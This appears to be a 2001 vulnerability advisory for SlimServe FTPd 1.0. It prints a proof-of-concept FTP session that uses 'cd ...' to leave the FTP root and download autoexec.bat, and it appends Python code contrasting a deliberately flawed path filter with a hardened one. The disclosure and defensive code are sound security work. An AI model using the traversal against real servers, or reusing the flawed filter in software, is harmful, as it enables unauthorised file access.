Reported March 1, 2001, by Ken Pfeil.
- SlimServe FTPd 1.0
A vulnerability exists that lets an attacker break out of the FTP root by using relative paths. For example, by connecting to a vulnerable host and issuing the command "cd ..." an attacker can access the root directory where the FTP server is running.
Joe Testa also provided the following proof-of-concept scenario:
C:\> ftp hostname
Connected to vulnerablehost.somewhere.com.
220-SlimServe FTPd 1.0 :: www.whitsoftdev.com.
220 127.0.0.1 connected to vulnerablehost.somewhere.com.
User (vulnerablehost.somewhere.com:(none)): anonymous
230 User anonymous logged in, proceed.
ftp> cd ...
250 CWD command successful.
ftp> get autoexec.bat
200 PORT command successful.
150 Opening data connection for "/.../autoexec.bat".
250 RETR command successful.
ftp: 383 bytes received in 0.16Seconds 2.39Kbytes/sec.
The vendor, WhitSoft Development, has been notified. However, no workaround or fix is currently available.
Discovered by Joe Testa.
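The path check whose absence the transcript above demonstrates, as an added example (not code from SlimServe or from the advisory): `naive_resolve` blocks only the literal `..` component, while `safe_resolve` normalises the client path inside the virtual root and refuses dots-only components. The function names, and the premise that the host OS may treat a component such as `...` as a parent reference, are assumptions of this example.

```python
import posixpath


class PathRejected(Exception):
    """Raised when a client-supplied path must not be honoured."""


def naive_resolve(cwd, arg):
    # Flawed filter (hypothetical): only the exact ".." component is blocked,
    # so "..." is handed to the operating system unchanged.
    if ".." in arg.replace("\\", "/").split("/"):
        raise PathRejected(arg)
    return posixpath.join(cwd, arg)


def safe_resolve(cwd, arg):
    """Resolve arg against the virtual cwd; the result never leaves "/".

    The caller joins the returned virtual path onto the real FTP root.
    """
    if "\x00" in arg or ":" in arg:
        raise PathRejected(arg)  # NUL bytes, drive letters, stream names
    arg = arg.replace("\\", "/")  # treat both separators alike
    parts = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]
    for comp in arg.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if parts:
                parts.pop()  # clamp at the virtual root instead of escaping
            continue
        # Win32 strips trailing dots and spaces, so such names alias others;
        # dots-only components like "..." or "...." are caught here too.
        if comp.rstrip(". ") != comp:
            raise PathRejected(arg)
        parts.append(comp)
    return "/" + "/".join(parts)


if __name__ == "__main__":
    # Constructed inputs modelled on the commands in the transcript.
    print(naive_resolve("/", "..."))  # passes the flawed filter
    for attempt in ("...", "...\\autoexec.bat", "..", "pub/readme.txt"):
        try:
            print(attempt, "->", safe_resolve("/", attempt))
        except PathRejected:
            print(attempt, "-> rejected")
```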